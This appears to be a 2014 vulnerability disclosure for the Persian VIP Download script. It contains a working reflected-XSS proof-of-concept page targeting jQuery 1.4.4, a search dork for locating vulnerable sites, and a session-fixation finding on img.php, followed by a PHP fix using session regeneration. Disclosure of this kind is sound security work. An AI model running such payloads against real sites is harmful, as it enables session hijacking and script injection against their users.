
Persian VIP Download(ir) Multi Vulnerability

Author: indoushka, Published: 25-10-2014
Persian VIP Download(ir) Multi Vulnerability
============================================
Author : indoushka
Vendor : DEVIRAN.COM
Dork : تمامی حقوق متعلق به پرشین اسکریپت می باشد | پیاده سازی توسط ZegerSot
==========================

jQuery cross site scripting :

<html>
<head>
<meta charset="utf-8">
<title>XSS Reflected - Jquery 1.4.4 </title>
<script src="http://localhost/Persian/js/jquery-1.4.4.min.js"></script>
<script>
$(function() {
$('#users').each(function() {
var select = $(this);
var option = select.children('option').first();
select.after(option.text());
select.hide();
});
});
</script>
</head>


<body>
<form method="post">
<p>
<select id="users" name="users">
<option value="xssreflected"><script>alert(&#x27;xss
reflected - jquery 1.4.4 by - indoushka thnx to
@firebitsbr - mauro.risonho@gmail.com&#x27;);</script></option>
</select>
</p>
</form>
</body>
</html>

Manual confirmation is required for this alert.

Session fixation is an attack that lets an attacker hijack a valid user session. It exploits a weakness in how the vulnerable web application manages the session ID: when authenticating a user, the application does not assign a new session ID, so an existing session ID can be reused. The attack consists of inducing a user to authenticate with a session ID the attacker already knows, and then hijacking the now-authenticated session using that ID. The attacker has to provide a legitimate web application session ID and get the victim's browser to use it.
Affected items
/Persian/img/img.php
The impact of this vulnerability
An attacker can fixate (set) the victim's session identifier.

How to fix this vulnerability
Web applications must ignore any session ID provided by the user's browser at login and must always generate a new session to which the user will log in if successfully authenticated.
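
The fix described above, sketched in PHP as an added example (not code from the affected script or its vendor): strict session mode discards a browser-supplied ID the server never issued, and a fresh ID is generated on successful login. The login() and lookup_password_hash() functions and the demo user are hypothetical and constructed for illustration.

```php
<?php
declare(strict_types=1);

// Added example: hypothetical login handler, not taken from the affected script.

// Reject session IDs the server did not issue and accept the ID only from
// the cookie, never from the URL or a form field.
session_start([
    'use_strict_mode'  => 1,
    'use_only_cookies' => 1,
    'use_trans_sid'    => 0,
    'cookie_httponly'  => 1,
    'cookie_samesite'  => 'Lax',
]);

// Constructed sample user store; a real application would query its database.
function lookup_password_hash(string $user): ?string
{
    static $users = null;
    $users ??= ['demo' => password_hash('constructed-sample-password', PASSWORD_DEFAULT)];
    return $users[$user] ?? null;
}

function login(string $user, string $password): bool
{
    $hash = lookup_password_hash($user);
    if ($hash === null || !password_verify($password, $hash)) {
        return false;
    }
    // Core fix: issue a new ID at the privilege change and delete the old
    // session data, so an ID set before login never becomes authenticated.
    session_regenerate_id(true);
    $_SESSION = ['user' => $user, 'authenticated_at' => time()];
    return true;
}

if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    $ok = login((string)($_POST['user'] ?? ''), (string)($_POST['password'] ?? ''));
    http_response_code($ok ? 200 : 401);
    echo $ok ? 'logged in' : 'invalid credentials';
}
```

To check the behaviour, send a request with a self-chosen PHPSESSID cookie and compare it with the Set-Cookie value returned after login; the two must differ.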

This vulnerability affects /Persian/img/img.php.
Discovered by: Scripting (Session_Fixation.script).
Attack details
Session cookie PHPSESSID was fixed to indoufixation
